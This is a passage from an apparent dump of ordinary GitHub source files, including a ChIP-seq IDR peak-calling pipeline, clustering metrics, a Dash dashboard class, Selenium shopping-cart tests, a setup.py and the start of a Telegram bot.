template=pysam_in))\n lower = upper\n\n # iterate through reads in samfile and write them to an outfile at random\n for read in pysam_in.fetch():\n r_num = random.random()\n for i in range(len(intervals)):\n if r_num < intervals[i]:\n outfile_handles[i].write(read)\n break\n else:\n continue\n\n # close outfiles\n for i in range(n_outfiles):\n outfile_handles[i].close()\n\n # index outfiles (pysam.index() throws an error)\n for split_sam in outfile_names:\n to_cluster = False\n statement = (\"samtools index %(split_sam)s\")\n P.run()\n\n\ndef filterBadLibraries(infiles, bad_samples):\n \"\"\"\n Takes a list of infiles, removes those files that match any pattern in list\n of bad_samples, returns the filtered list of outfiles\n \"\"\"\n bad_samples = [re.compile(x) for x in bad_samples]\n to_remove = []\n for inf in infiles:\n for regex in bad_samples:\n if regex.search(str(inf)):\n to_remove.append(inf)\n return to_remove\n\n\ndef mergeBams(infile_list, outfile):\n infile_list = \" \".join(infile_list)\n job_memory = \"5G\"\n statement = (\"samtools merge - %(infile_list)s\"\n \" | samtools sort - -o %(outfile)s\"\n \" 2>%(outfile)s.log;\"\n \" checkpoint;\"\n \" samtools index %(outfile)s\"\n \" 2>%(outfile)s.bai.log\")\n P.run()\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Run Peak Calling For IDR\n##########################################################################\n\n\ndef callIDRPeaks(infile,\n outfile,\n peak_caller,\n control_option,\n PARAMS_PEAKCALLER,\n pseudoreplicate=False):\n\n # select peak caller to use\n if peak_caller == \"macs2\":\n caller = macs2IDRPeaks(control_option, PARAMS_PEAKCALLER)\n elif peak_caller == \"spp\":\n caller = sppIDRPeaks(control_option, PARAMS_PEAKCALLER)\n else:\n raise ValueError(\"Unrecognized peak-caller: %s\" % peak_caller)\n\n caller.run(infile, outfile, pseudoreplicate)\n\n\nclass callerIDRPeaks(object):\n\n \"\"\"\n Generic class for handling peak calling for IDR analysis\n \"\"\"\n\n def __init__(self, control_option, PARAMS_PEAKCALLER):\n self.control_option = control_option\n self.PARAMS_PEAKCALLER = PARAMS_PEAKCALLER\n\n def getControlfile(self, track):\n \"\"\"\n Return appropriate input file for a track.\n For pooled tracks (R0), will always return a pooled input file.\n If options set to pooled, will return a pooled input for all tracks.\n If options set to single, will return first input replicate (R1).\n If options set to matched, will return input with matching replicate.\n Otherwise will return ValueError\n \"\"\"\n n = track.clone()\n # is hardcoded into regex for ruffus tasks\n n.data[\"attribute1\"] = \"input\"\n\n if n.replicate == \"R0\":\n # if track is pooled, then select pooled input\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"./bamfiles_pooled\", control)\n elif self.control_option == \"pool\":\n # if all controls are pooled, then select pooled input\n n.replicate = \"R0\"\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"./bamfiles_pooled\", control)\n elif self.control_option == \"single\":\n # if only one input file available, select it\n n.replicate = \"R1\"\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"./bamfiles_filtered\", control)\n elif self.control_option == \"matching\":\n # otherwise, select input with matching replicate\n control = os.path.basename(\"%s.bam\" % n.asFile())\n control = os.path.join(\"bamfiles_filtered\", control)\n else:\n raise ValueError(\"Unrecognised option_control %s\"\n \" must be either pooled, single, or matching\")\n\n if not os.path.exists(control):\n raise IOError(\"Control file is missing: %s\" % control)\n\n return control\n\n def getRunStatement(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific run statement for each peakcaller class\n \"\"\"\n return \"\"\n\n def postProcess(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific post process statement for each peakcaller class\n that generates an outfile in the format required by IDR\n \"\"\"\n return \"\"\n\n def run(self, infile, outfile, pseudoreplicate):\n \"\"\"\n Gets gets appropriate input\n Generates a run statement\n Submits job\n Runs post processing steps for IDR\n \"\"\"\n\n # get appropriate input\n Sample = PipelineTracks.AutoSample\n if pseudoreplicate:\n try:\n track = P.snip(infile, \"_00.bam\")\n except:\n track = P.snip(infile, \"_01.bam\")\n else:\n track = P.snip(infile, \".bam\")\n controlfile = self.getControlfile(Sample(track))\n\n # following bugfix, check input file actually contains word 'input'\n assert re.search(\"input\", os.path.basename(controlfile)), \\\n \"Input file doesn't contain 'input' in name: %s\" % controlfile\n\n # run peakcalling\n statement = self.getRunStatement(infile, outfile, controlfile)\n # check run statement\n # print (\"\\nRun statement for sample %s :\\n %s\" % (infile, statement))\n job_memory = \"10G\"\n P.run()\n\n # post process peakcalling results\n ignore_pipe_errors = True\n statement = self.postProcess(infile, outfile, controlfile)\n # check post process statement\n # print (\"\\nPost-process statement for sample %s :\"\n # \"\\n %s\" % (infile, statement))\n if statement:\n P.run()\n else:\n pass\n\n\nclass macs2IDRPeaks(callerIDRPeaks):\n\n \"\"\"\n \"\"\"\n\n def getRunStatement(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific run statement for each peakcaller class\n \"\"\"\n\n # generate outfile prefix\n dir_name = os.path.dirname(outfile)\n infile_stub = P.snip(os.path.basename(infile), \".bam\")\n control_stub = P.snip(os.path.basename(controlfile), \".bam\")\n outfile_stub = infile_stub + \"_VS_\" + control_stub\n outfile_stub = os.path.join(dir_name, outfile_stub)\n\n # build macs2 commandline statement\n statement = [(\"macs2 callpeak\"\n \" --treatment %(infile)s\"\n \" --control %(controlfile)s\"\n \" --verbose=10\")]\n\n # add additional parameters\n # currently the input read format has to be bam bc of ruffus regex\n statement.append(\"--format BAM\")\n statement.append(\"--name %s\" % outfile_stub)\n # require genome size, if it is not specified try to take from genome\n if not re.search(\"-g\\s|--gsize\",\n self.PARAMS_PEAKCALLER[\"macs2_options_parameters\"]):\n statement.append(\n \"--gsize %s\" % self.PARAMS_PEAKCALLER[\n \"macs2_options_genome_prefix\"][:2])\n\n # set threshold for lax peak calling\n if self.PARAMS_PEAKCALLER[\"macs2_options_fdr\"]:\n if self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"]:\n raise Exception(\"Value specified for both macs2 options\"\n \" -pvalue and -fdr please select one or\"\n \" other option, but not both\")\n else:\n threshold = \"--qvalue \" + \\\n str(self.PARAMS_PEAKCALLER[\"macs2_options_fdr\"])\n elif self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"]:\n threshold = \"--pvalue=\" + \\\n str(self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"])\n else:\n raise Exception(\"Must specify a value for either\"\n \" macs2_options_pvalue or macs2_options_fdr,\"\n \" but not both\")\n statement.append(threshold)\n\n # deal with duplicate reads\n if self.PARAMS_PEAKCALLER[\"macs2_options_keep_duplicates\"]:\n statement.append(\n \"--keep-dup %s\" % self.PARAMS_PEAKCALLER[\n \"macs2_options_keep_duplicates\"])\n\n # add additional parameters\n statement.append(self.PARAMS_PEAKCALLER[\"macs2_options_parameters\"])\n\n # write log information to sentinel file\n statement.append(\">& %(outfile)s\")\n\n statement = (\" \".join(statement) % locals())\n\n return statement\n\n def postProcess(self, infile, outfile, controlfile):\n \"\"\"\n Takes the narrowPeak files output by macs2.\n If macs2 given pvalue, then sorts by column 8 (-log10(pval))\n If macs2 given fdr, then sorts by column 9 (-log10(qval)).\n Generates a regionPeak File in the format required for IDR analysis\n N.B. IDR pipeline expects macs2 to output .encodePeak file, whereas it\n actually outputs a .narrowPeak file.\n \"\"\"\n # generate outfile prefix\n dir_name = os.path.dirname(outfile)\n infile_stub = P.snip(os.path.basename(infile), \".bam\")\n control_stub = P.snip(os.path.basename(controlfile), \".bam\")\n outfile_stub = infile_stub + \"_VS_\" + control_stub\n outfile_stub = os.path.join(dir_name, outfile_stub)\n\n # set up sort statement\n if self.PARAMS_PEAKCALLER[\"macs2_options_pvalue\"]:\n sort_column = \"8nr,8nr\"\n else:\n sort_column = \"9nr,9nr\" # Check this!\n\n npeaks = self.PARAMS_PEAKCALLER[\"macs2_options_npeaks\"]\n\n # format outfile as required for idr\n statement = [(\"sort\"\n \" -k %(sort_column)s\"\n \" %(outfile_stub)s_peaks.narrowPeak\"\n \" | head -n %(npeaks)s\"\n \" | gzip\"\n \" > %(outfile_stub)s.regionPeak.gz\")]\n # zip the original bedfile\n statement.append(\"; gzip %(outfile_stub)s_peaks.narrowPeak\")\n # zip the excel file\n statement.append(\"; gzip %(outfile_stub)s_peaks.xls\")\n # zip the summits file\n statement.append(\"; gzip %(outfile_stub)s_summits.bed\")\n # create statement\n statement = (\"\".join(statement) % locals())\n\n return statement\n\n\nclass sppIDRPeaks(callerIDRPeaks):\n\n \"\"\"\n Class for calling IDR peaks using spp.\n No postprocessing is run because spp outputs files in the format required\n for IDR\n \"\"\"\n\n def getRunStatement(self, infile, outfile, controlfile):\n \"\"\"\n Generate a specific run statement for each peakcaller class\n \"\"\"\n # select location of the spp script to run\n if self.PARAMS_PEAKCALLER[\"spp_options_idr_script\"] == \"default\":\n executable = IOTools.which(\"run_spp.R\")\n elif self.PARAMS_PEAKCALLER[\"spp_options_idr_script\"] == \"nodups\":\n executable = IOTools.which(\"run_spp_nodups.R\")\n else:\n executable = self.PARAMS_PEAKCALLER[\"spp_options_idr_script\"]\n try:\n os.path.exists(executable)\n except:\n raise IOError(\"SPP script not found: %s\" % executable)\n\n # select the threshold for lax peak calling\n if self.PARAMS_PEAKCALLER[\"spp_options_npeaks\"]:\n if self.PARAMS_PEAKCALLER[\"spp_options_fdr\"]:\n raise Exception(\"Value specified for both SPP options\"\n \" -npeaks and -fdr please select one or\"\n \" other option, but not both\")\n else:\n threshold = \"-npeaks=\" + \\\n str(self.PARAMS_PEAKCALLER[\"spp_options_npeaks\"])\n elif self.PARAMS_PEAKCALLER[\"spp_options_fdr\"]:\n threshold = \"-fdr=\" + \\\n str(self.PARAMS_PEAKCALLER[\"spp_options_fdr\"])\n else:\n raise Exception(\"Must specify a value for either\"\n \" spp_options_npeaks or spp_options_fdr,\"\n \" but not both\")\n\n # build run statement for spp.\n # -savn is output.npeak.file (passed as NULL,\n # means filename based on infile)\n # -out is output.result.file\n # -odir defaults to os.path.dirname( infile )\n # -savn is save narrowpeak file\n # -savr is save regionpeak file\n # (run_spp.R script throws an error if region peak is not output).\n statement = [(\"Rscript %(executable)s\"\n \" -c=%(infile)s\"\n \" -i=%(controlfile)s\"\n \" %(threshold)s\"\n \" -savn\"\n \" -savr\")]\n\n # add additional options\n statement.append(self.PARAMS_PEAKCALLER[\"spp_options_parameters\"])\n\n # specify outfile\n # MM: this was hard-coded to a non-existent directory\n # changed to stats directory\n statement.append(\" -rf\"\n \" -out=./stats/phantomPeakStatsReps.tab\"\n \" >& %(outfile)s\")\n\n statement = (\" \".join(statement) % locals())\n\n return statement\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Run IDR analysis\n##########################################################################\n\n\ndef getIDRStatement(infile1,\n infile2,\n outfile,\n overlap_ratio,\n ranking_measure,\n chr_table):\n\n # get outfile stub\n inf1 = os.path.basename(infile1).split(\"_VS_\")[0]\n inf2 = os.path.basename(infile2).split(\"_VS_\")[0]\n out_prefix = os.path.join(os.path.dirname(outfile),\n inf1 + \"_vs_\" + inf2)\n\n idr_wrapper = WrapperIDR.__file__\n\n statement = (\"python %(idr_wrapper)s\"\n \" --action=run\"\n \" --output-prefix=%(out_prefix)s\"\n \" --chromosome-table=%(chr_table)s\"\n \" --signal-value=%(ranking_measure)s\"\n \" --overlap-ratio=%(overlap_ratio)s\"\n \" %(infile1)s\"\n \" %(infile2)s\"\n \" >> %(outfile)s\" % locals())\n\n return statement\n\n\ndef getIDRPlotStatement(infiles, outfile):\n \"\"\"\n Receives list of infiles, the fist of which is a sentinel, the subsequent\n files are *uri.sav files output from run-batch-consistency.r script.\n Returns a run statement for batch-consistency-plot.r as it is wrapped in\n WrapperIDR.py\n \"\"\"\n infile_prefixes = [P.snip(x, \"-uri.sav\") for x in infiles[1:]]\n infile_prefixes = \" \".join(infile_prefixes)\n outfile_prefix = P.snip(outfile, \".pdf\")\n \n idr_wrapper = WrapperIDR.__file__\n\n statement = (\"python %(idr_wrapper)s\"\n \" --action=plot\"\n \" --output-prefix=%(outfile_prefix)s\"\n \" %(infile_prefixes)s;\"\n \" convert\"\n # \" -resize 125%%\" why does this cause an error?\n \" %(outfile_prefix)s.pdf\"\n \" %(outfile_prefix)s.png\" % locals())\n\n return statement\n\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Post Process PeakCalling\n##########################################################################\ndef countPeaks(infiles, outf):\n \"\"\"\n Count the number of peaks in each narrowPeak file\n \"\"\"\n for infile in infiles:\n sample_id = os.path.basename(infile).split(\"_VS_\")[0]\n tissue, condition, replicate = sample_id.split(\"-\")\n experiment = tissue + \"_\" + condition\n n_peaks = str(len(IOTools.openFile(infile).readlines()))\n outf.write(\"\\t\".join([sample_id,\n experiment,\n tissue,\n condition,\n replicate,\n n_peaks]) + \"\\n\")\n outf.close()\n\n##########################################################################\n##########################################################################\n##########################################################################\n# Post Process IDR\n##########################################################################\n\n\ndef findNPeaks(infiles, outfile, params):\n outf = IOTools.openFile(outfile, \"w\")\n outf.write(\"Tissue\\t\"\n \"Condition\\t\"\n \"Experiment\\t\"\n \"idr_comp\\t\"\n \"sample_1\\t\"\n \"sample_2\\t\"\n \"n_peaks\\n\")\n idr_threshold = float(params[0])\n\n # Hack: for only one infile, P.submit returns a string rather than a list\n if type(infiles) is str:\n infiles = [infiles, ]\n\n for inf in infiles:\n inf_name = P.snip(os.path.basename(inf), \"-overlapped-peaks.txt\")\n tissue = inf_name.split(\"-\")[0]\n condition = inf_name.split(\"-\")[1]\n experiment = \"_\".join([tissue, condition])\n sample1, sample2 = inf_name.split(\"_vs_\")\n n_peaks = 0\n header = True\n for line in IOTools.openFile(inf):\n if header:\n header = False\n continue\n line = line.split()\n if float(line[10]) <= idr_threshold:\n n_peaks += 1\n else:\n continue\n outf.write(tissue + \"\\t\" +\n condition + \"\\t\" +\n experiment + \"\\t\" +\n inf_name + \"\\t\" +\n sample1 + \"\\t\" +\n sample2 + \"\\t\" +\n str(n_peaks) + \"\\n\")\n\n outf.close()\n","repo_name":"CGATOxford/CGATPipelines","sub_path":"obsolete/PipelineIDR.py","file_name":"PipelineIDR.py","file_ext":"py","file_size_in_byte":19212,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"54"} +{"seq_id":"23997268125","text":"from scipy.stats import gaussian_kde\nfrom scipy.stats import entropy\nfrom scipy.integrate import quad\nimport numpy as np\nfrom sklearn.cluster import AgglomerativeClustering\nfrom utils import *\n\ndef kl_div(dist1, dist2):\n kde1 = gaussian_kde(dist1)\n kde2 = gaussian_kde(dist2)\n def kl_util(i):\n return kde1(i) * np.log(kde1(i) / kde2(i))\n upper_bound = max(max(dist1), max(dist2))\n return quad(kl_util, a=0, b=upper_bound)\n\n# functions for calculating variation of information\n\ndef r_f(labels1, labels2, i, j):\n if len(labels1) != len(labels2):\n print('failure')\n return\n indices1 = get_indices(labels1, i)\n indices2 = get_indices(labels2, j)\n intersection = [item for item in indices1 if item in indices2]\n return len(intersection) / len(labels1)\n\ndef v_i(labels1, labels2):\n summation = 0\n for i in set(labels1):\n for j in set(labels2):\n r_value = r_f(labels1, labels2, i, j)\n p_i = list(labels1).count(i) / len(labels1)\n q_j = list(labels2).count(j) / len(labels1)\n entry = -r_value * (np.log(r_value/p_i) + np.log(r_value/q_j))\n if not np.isnan(entry) and not np.isinf(entry):\n summation += entry\n return summation\n\n# ranking functions\n\ndef rank_vi(data):\n start_labels = AgglomerativeClustering(n_clusters=10).fit_predict(data)\n v_dict = {} # global VI\n cluster_dict = {} # cluster integrity\n for marker in data.columns:\n print(marker)\n new_data = data.drop(marker, axis=1)\n new_clustering = AgglomerativeClustering(n_clusters=10).fit_predict(new_data)\n v_dict[marker] = v_i(start_labels, new_clustering)\n # calculate cluster integrity\n temp = {}\n for cluster in set(start_labels):\n original_indices = get_indices(start_labels, cluster)\n temp[cluster] = entropy(new_clustering[original_indices])\n cluster_dict[marker] = temp\n return v_dict, cluster_dict\n\ndef rank_kl(data, cluster_labels):\n cluster_dict = {}\n data = np.arcsinh(data.drop('Labels', axis=1))\n for marker in data.columns:\n print(marker)\n temp = {}\n for cluster in set(cluster_labels):\n cluster_data = data.iloc[[i for i, item in enumerate(cluster_labels) if item==cluster]]\n kl = kl_div(cluster_data[marker], data[marker])\n temp[cluster] = kl[0]\n cluster_dict[marker] = temp\n return cluster_dict","repo_name":"ErolB/ClusterViewer","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15517659073","text":"from typing import Optional\n\nfrom dash import dcc, html\nfrom dash.development.base_component import Component\nfrom dash_bootstrap_components import Container\n\n\n\nclass Dashboard(Container):\n \"\"\"Container principal da aplicação.\n\n Parameters\n ----------\n children : Dash component | list of Dash components, optional\n The container main content.\n navbar : dash_charlotte.Navbar, optional\n Navbar added at the top of the dashboard.\n drawer : dash_charlotte.Drawer, optional\n The dashboard sidenav.\n id : str, default='dashboard'\n Dashboard ID.\n\n Components IDs\n --------------\n {id}\n Container principal.\n {id}--data\n Componente para armazenamento de dados.\n {id}--location\n Componente que gerencia a URL da página.\n\n \"\"\"\n\n def __init__(\n self,\n children: Optional[Component] = None,\n navbar: Optional[Component] = None,\n drawer: Optional[Component] = None,\n id: str = 'dashboard'\n ):\n\n if not isinstance(children, list):\n children = [children]\n\n super().__init__(\n id = id,\n fluid = True,\n className = 'dashboard-container shade7',\n children = [\n dcc.Location(id=f'{id}--location'),\n dcc.Store(id=f'{id}--data'),\n drawer,\n html.Section(\n className = 'home-section',\n children = [navbar] + children\n )\n ]\n )\n","repo_name":"GusFurtado/dash-charlotte","sub_path":"{{cookiecutter.app_name}}/components/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"73291946721","text":"import re\nfrom typing import List\n\nfrom math_operations import Val, Coef, Vector, Sum, Product\n\n\ndef parse_line(line: str):\n \"\"\"Разбирает строковое выражение на объекты из math_operations.py\"\"\"\n s = re.split('( |\\*|\\+|\\n)', line)\n s = list(filter(lambda x: x not in ('', ' ', '\\n'), s))\n return _parse(s)\n\n\ndef _parse(expr: List[str]):\n if len(expr) == 1:\n try:\n return Val(int(expr[0]))\n except ValueError:\n if expr[0] in ('a', 'b', 'c'):\n return Coef(expr[0])\n elif expr[0] in ('e1', 'e2', 'e3', 'e4', 'e5', 'e6', 'e7', 'v0'):\n return Vector(expr[0])\n raise ValueError(expr[0])\n else:\n for i, s in enumerate(expr):\n if s == '+':\n return Sum(_parse(expr[:i]), _parse(expr[i + 1:]))\n for i, s in enumerate(expr):\n if s == '*':\n return Product(_parse(expr[:i]), _parse(expr[i + 1:]))\n return ValueError(expr)\n\n\nif __name__ == '__main__':\n for s in (\n 'a + b',\n 'e1 + 2*e2',\n '0 * e1 - 2*e2',\n '0*e1+-2+e2',\n '0',\n 'v0'\n ):\n parsed = parse_line(s)\n print(s, ':', parsed, type(parsed))\n","repo_name":"chalex2k/Lie_algebra_Jacobi_check","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36711612237","text":"\"\"\"\n# !/usr/bin/env 全部\n# -*- coding: utf-8 -*-\n@Time : 2022/3/24 21:53\n@File : HJ31 单词倒排.py\n\"\"\"\n\n\ndef reverseStence(str):\n \"\"\"\n 描述\n 对字符串中的所有单词进行倒排。\n\n 说明:\n\n 1、构成单词的字符只有26个大写或小写英文字母;\n\n 2、非构成单词的字符均视为单词间隔符;\n\n 3、要求倒排后的单词间隔符以一个空格表示;如果原字符串中相邻单词间有多个间隔符时,倒排转换后也只允许出现一个空格间隔符;\n\n 4、每个单词最长20个字母;\n\n 数据范围:字符串长度满足 1 \\le n \\le 10000 \\1≤n≤10000\n 输入描述:\n 输入一行,表示用来倒排的句子\n\n 输出描述:\n 输出句子的倒排结果\n :param str:\n :return:\n \"\"\"\n str = str.strip()\n new_str = ''\n str = ' '+ str\n r = 0\n ss = ''\n for i in range(len(str)-1, -1, -1):\n s = str[i]\n if s.isalpha():\n r += 1\n ss = str[i:i+r]\n else:\n new_str += ss + ' '\n r = 0\n ss = ''\n\n return new_str\n\nprint(reverseStence('I am a student'))\n","repo_name":"linksdl/meta-project-learning_programming_algorithms","sub_path":"牛客-华为机考/字符串/HJ31 单词倒排.py","file_name":"HJ31 单词倒排.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"34574329357","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.expected_conditions import presence_of_element_located\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\n@pytest.fixture(autouse=True)\ndef testing():\n pytest.driver = webdriver.Chrome('./chromedriver')\n pytest.driver.get('https://royalfashion.com.ua')\n yield\n pytest.driver.quit()\n\n\ndef test_add_item_to_cart():\n search_page_for_shorts()\n item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n add_current_item_to_cart()\n close_cart_dialog()\n\n assert_cart_contains_items_and_sum(1, item1_price)\n\n\ndef test_add_couple_of_items_to_cart_should_calculate_both():\n search_page_for_shorts()\n\n item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n add_current_item_to_cart()\n close_cart_dialog()\n\n # adding 2nd item to the cart\n pytest.driver.get('https://royalfashion.com.ua')\n search_page_for_shorts()\n\n item2_price = open_item_on_screen('Темно-сині жіночі спортивні шорти')\n add_current_item_to_cart()\n close_cart_dialog()\n\n assert_cart_contains_items_and_sum(2, item1_price+item2_price)\n\n\ndef test_should_add_1_item_and_then_remove_it_from_the_cart():\n search_page_for_shorts()\n item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n add_current_item_to_cart()\n close_cart_dialog()\n assert_cart_contains_items_and_sum(1, item1_price)\n\n open_cart()\n\n remove_item_from_cart('Сірі жіночі шорти в смужку')\n\n\ndef test_should_add_2_elements_calculate_sum_then_remove_1_and_recalculate():\n search_page_for_shorts()\n\n item1_price = open_item_on_screen('Сірі жіночі шорти в смужку')\n add_current_item_to_cart()\n close_cart_dialog()\n\n # adding 2nd item to the cart\n pytest.driver.get('https://royalfashion.com.ua')\n search_page_for_shorts()\n\n item2_price = open_item_on_screen('Темно-сині жіночі спортивні шорти')\n add_current_item_to_cart()\n close_cart_dialog()\n\n assert_cart_contains_items_and_sum(2, item1_price+item2_price)\n\n open_cart()\n\n remove_item_from_cart('Сірі жіночі шорти в смужку')\n\n assert_cart_contains_items_and_sum(1, item2_price)\n\n\n# ------------------------------------------------------------------\n\n\ndef open_cart():\n cart_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_basket\"]/a[1]/span[1]')))\n cart_button.click()\n\n\ndef remove_item_from_cart(item_name):\n all_items = pytest.driver.find_elements_by_class_name('productslist_item')\n for every_item in all_items:\n if item_name.upper() in every_item.text:\n remove_button = every_item.find_elements_by_class_name('productslist_product_remove')\n remove_button[0].click()\n break\n\n\ndef assert_cart_contains_items_and_sum(item_number, total_amount_to_pay):\n number_of_items_element = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_basket\"]/a[1]/span[1]')))\n total_amount_element = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_basket\"]/a[1]/strong[1]')))\n assert item_number == int(number_of_items_element.text)\n assert total_amount_to_pay == split_price_and_convert_to_float(total_amount_element.text)\n\n\ndef open_item_on_screen(item_name):\n screen_item = get_item_from_the_screen(item_name)\n item_price = get_item_price(screen_item)\n url_to_open = screen_item.find_elements_by_xpath('.//a')[1].get_attribute('href')\n pytest.driver.get(url_to_open)\n return item_price\n\n\ndef get_item_price(item_on_screen):\n item_text = item_on_screen.text\n item_text_array = item_text.split('\\n')\n item_price_text = item_text_array[len(item_text_array) - 2]\n return split_price_and_convert_to_float(item_price_text)\n\ndef split_price_and_convert_to_float(price_text):\n item_price_splited = price_text.split()\n return float(item_price_splited[0].replace(',', '.'))\n\n\ndef add_current_item_to_cart():\n size_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"projector_sizes_cont\"]/div[1]/a[1]')))\n size_button.click()\n\n add_to_cart_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.ID, 'projector_button_basket')))\n add_to_cart_button.click()\n\ndef close_cart_dialog():\n close_dialog_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.ID, 'dialog_close')))\n close_dialog_button.click()\n\n\ndef get_item_from_the_screen(item_text):\n all_search_div_elements = pytest.driver.find_elements_by_xpath('//*[@id=\"search\"]/div')\n filtered_items = []\n for div_element in all_search_div_elements:\n if item_text in div_element.text:\n filtered_items.append(div_element)\n\n return filtered_items[0]\n\ndef search_page_for_shorts():\n pytest.driver.find_element_by_id('menu_search_text').send_keys('Шорти жіночі')\n search_button = WebDriverWait(pytest.driver, 10).until(presence_of_element_located((By.XPATH, '//*[@id=\"menu_search\"]/button[1]')))\n search_button.click()\n\n target_text = pytest.driver.find_element_by_css_selector(\"div#content > div > h1\").text\n assert \"Результати пошуку\" == target_text\n items_number_label = pytest.driver.find_element_by_xpath(\"//*[@id=\\\"content\\\"]/div[1]/span[1]/b[1]\").text\n number_of_all_shorts_found = int(items_number_label)\n assert number_of_all_shorts_found > 0","repo_name":"NataliMigunova/SkillFactory_Final_project","sub_path":"Test_cart_functionality.py","file_name":"Test_cart_functionality.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14635949762","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 12 13:59:15 2022\r\n\r\n@author: CEOSpaceTech\r\n\"\"\"\r\nF_score1 =[]\r\nF_score2 =[]\r\npresall =[]\r\nP_all=[] \r\nfor n in range(10):\r\n normal_class = n\r\n retrievd_number = 60\r\n test_number =[600,600,600,500,500,400,500,600,500,600]\r\n relevant_number = 400 #test_number[normal_class]\r\n lines = []\r\n\r\n f=open('D:/Omid/UPB/Journal/Deep-SVDD/EuroSAT/TSNE/one vs one/MS/org/'+str(normal_class)+'/1/sort.txt','r') \r\n \r\n lines = f.readlines()\r\n Presicion=[]\r\n for k in [20,60,100,200,350]:\r\n count_p = 0 \r\n for i in range(k):\r\n if int(lines[i][-3])==normal_class:\r\n count_p +=1\r\n \r\n P = round((count_p /k),3)\r\n Presicion.append(P)\r\n pres=Presicion[0]\r\n P_all.append(Presicion)\r\n presall.append(pres)\r\n \r\n count_r = 0 \r\n for i in range(relevant_number):\r\n if int(lines[i][-3])==normal_class:\r\n count_r +=1\r\n R =round((count_r /relevant_number),3)\r\n \r\n \r\n # print(PR)\r\n F1=round((2*Presicion[0]*R)/(Presicion[0]+R+0.000000005),3)\r\n F2=round((5*Presicion[0]*R)/(4*Presicion[0]+R+0.000000005),3)\r\n F_score1.append(F1)\r\n F_score2.append(F2)\r\n print(R)\r\n","repo_name":"omid-ghozatlou/Query-by-Example-Using-SVDD","sub_path":"IR_evaluation.py","file_name":"IR_evaluation.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17928173517","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport io\nimport os\nfrom setuptools import setup\n\nDEPENDENCIES = ['pandas==1.5.3',\n'numpy==1.21.0',\n'SQLAlchemy==2.0.12',\n'scipy==1.7.3',\n'ipykernel==6.9.1',\n'ipython==8.2.0',\n'ipython-genutils==0.2.0',\n'ipywidgets==7.6.5',\n'jupyterlab==3.3.2',\n'mysql-connector-python==8.0.29']\n\nCURDIR = os.path.abspath(os.path.dirname(__file__))\n\nwith io.open(os.path.join(CURDIR, \"README.md\"), \"r\", encoding=\"utf-8\") as f:\n README = f.read()\n\nsetup(\n name=\"SLKB\",\n version=\"1.0.11\",\n author=\"Birkan Gökbağ\",\n author_email=\"birkan.gokbag@gmail.com\",\n description=\"SLKB: Synthetic lethality knowledge base for gene combination double knockout experiments\",\n long_description=README,\n url=\"https://github.com/BirkanGokbag/SLKB-Analysis-Pipeline\",\n package_dir={'SLKB': 'SLKB'},\n packages=['SLKB'],\n include_package_data=True,\n keywords=[],\n scripts=[],\n zip_safe=False,\n install_requires=DEPENDENCIES,\n license=\"License :: OSI Approved :: GPL 3.0\",\n classifiers=[\n \"Programming Language :: Python\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"BirkanGokbag/SLKB-Analysis-Pipeline","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14632089611","text":"import time\r\nimport datetime\r\nimport pyfiglet\r\nimport logging\r\nimport logging.config\r\nimport os\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom dotenv import load_dotenv, find_dotenv\r\nmatplotlib.use('Agg')\r\nimport subprocess\r\n\r\nload_dotenv(find_dotenv())\r\n\r\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup\r\nfrom telegram.ext import (\r\n Updater,\r\n CommandHandler,\r\n MessageHandler,\r\n Filters,\r\n CallbackQueryHandler,\r\n)\r\nimport telegram\r\n\r\nfrom _model import *\r\n\r\nfrom fitbit_api.access_data import *\r\n\r\nfrom tinydb import TinyDB, Query\r\n# Database in json format\r\ndb = 